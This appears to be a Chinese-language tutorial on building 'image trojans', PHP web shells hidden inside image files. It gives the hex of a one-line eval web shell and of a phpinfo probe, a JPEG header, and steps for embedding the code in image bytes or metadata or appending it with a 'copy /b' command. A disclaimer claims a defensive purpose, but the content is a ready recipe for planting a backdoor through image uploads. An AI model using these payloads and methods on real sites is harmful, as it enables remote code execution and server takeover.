前言
图片马制作
本文仅提供文件的十六进制数据
本文仅用于网络信息防御学习
制作图片文件二进制
- 把PHP代码字符串转换为PHP代码十六进制数,然后再与图片文件头十六进制数与PHP代码十六进制数组合
- 这种图片因为只有文件头所以不能正常显示图片
phpinfo的十六进制数据
1
| 3C3F70687020706870696E666F28293B3F3E
|
一句话木马的十六进制数据
<?php eval($_REQUEST["<pwd>"]);?>
1
| 3C3F706870206576616C28245F524551554553545B223C7077643E225D293B3F3E
|
GIF文件头
PNG文件头
JPEG文件头
1
| FFD8FFE000104A4649460001
|
在图片二进制中注入恶意代码
准备工作
制作方法
- 用十六进制编辑器打开,然后把PHP代码十六进制数插入到图片文件的体中任意位置
在图片信息中注入恶意代码
准备工作
制作方法
- 右键图片文件->
属性->详细信息->在版权填写恶意代码
- 也可以通过PS将恶意代码写在图片的详细信息里
文件合并
准备工作
- Windows环境
- 一张正常显示的图片
- 恶意代码文件
制作方法
<file>.jpg:原图文件
<file>.php:原木马文件
<file_new>.jpg:合并后的图片马
1
| copy /b <file>.jpg+<file>.php <file_new>.jpg
|
完成
参考文献
哔哩哔哩——逆风微笑的代码狗
腾讯云开发者社区——腾讯AlloyTeam
程序师的博客
腾讯云开发者社区——天天P图攻城狮